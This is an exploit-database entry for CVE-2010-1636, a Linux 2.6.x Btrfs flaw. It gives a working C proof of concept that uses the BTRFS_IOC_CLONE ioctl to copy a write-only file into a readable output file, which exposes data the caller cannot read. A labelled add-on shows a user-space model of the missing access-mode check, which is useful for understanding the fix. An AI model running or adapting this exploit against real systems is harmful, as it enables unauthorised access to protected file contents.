Exploit Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass

Exploiter

18 Dec 2022
EDB-ID
34001
EDB Verified
Passed
Author
DAN ROSENBERG
Vulnerability type
LOCAL
Platform
LINUX
CVE
CVE-2010-1636
Publication date
2010-05-18
C:
/*
source: https://www.securityfocus.com/bid/40241/info

The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation.

An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks. 
*/

#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>

#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)

int main(int argc, char * argv[])
{

  if(argc < 3) {
    printf("Usage: %s [target] [output]\n", argv[0]);
    exit(-1);
  }

  int output = open(argv[2], O_WRONLY | O_CREAT, 0644);

  /* Note - opened for writing, not reading */
  int target = open(argv[1], O_WRONLY);

  ioctl(output, BTRFS_IOC_CLONE, target);

}
 
Source
www.exploit-db.com
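
The proof of concept works because the clone source is only open for writing, yet its contents end up in the output file. The following is an added example, not code from the original post or from the kernel: a user-space model of the access-mode check a clone operation needs before it copies data. `fd_access_mode` and `clone_allowed` are hypothetical names, the `-EBADF` return value is this example's choice, and the scratch file is constructed for the demonstration.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Access mode of an open descriptor: O_RDONLY, O_WRONLY or O_RDWR; -1 if unusable. */
static int fd_access_mode(int fd)
{
    int flags = fcntl(fd, F_GETFL);
    if (flags < 0)
        return -1;              /* closed or invalid descriptor */
#ifdef O_PATH
    if (flags & O_PATH)
        return -1;              /* O_PATH handles grant no data access */
#endif
    return flags & O_ACCMODE;
}

/* Hypothetical gate (user-space model): 0 if a clone from src_fd into dst_fd
 * may proceed, -EBADF otherwise (the errno is this example's assumption). */
int clone_allowed(int dst_fd, int src_fd)
{
    int dst = fd_access_mode(dst_fd);
    int src = fd_access_mode(src_fd);

    if (dst != O_WRONLY && dst != O_RDWR)
        return -EBADF;          /* destination must be writable */
    if (src != O_RDONLY && src != O_RDWR)
        return -EBADF;          /* source must be readable: the case the PoC relies on */
    return 0;
}

int main(void)
{
    char path[] = "/tmp/clone_gate_XXXXXX";    /* constructed scratch file */
    int dst = mkstemp(path);                   /* mkstemp opens O_RDWR */
    if (dst < 0)
        return 1;
    int src_wo = open(path, O_WRONLY);         /* same mode as the PoC's target */
    int src_ro = open(path, O_RDONLY);

    printf("write-only source: %d\n", clone_allowed(dst, src_wo));
    printf("read-only source:  %d\n", clone_allowed(dst, src_ro));

    close(src_wo);
    close(src_ro);
    close(dst);
    unlink(path);
    return 0;
}
```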
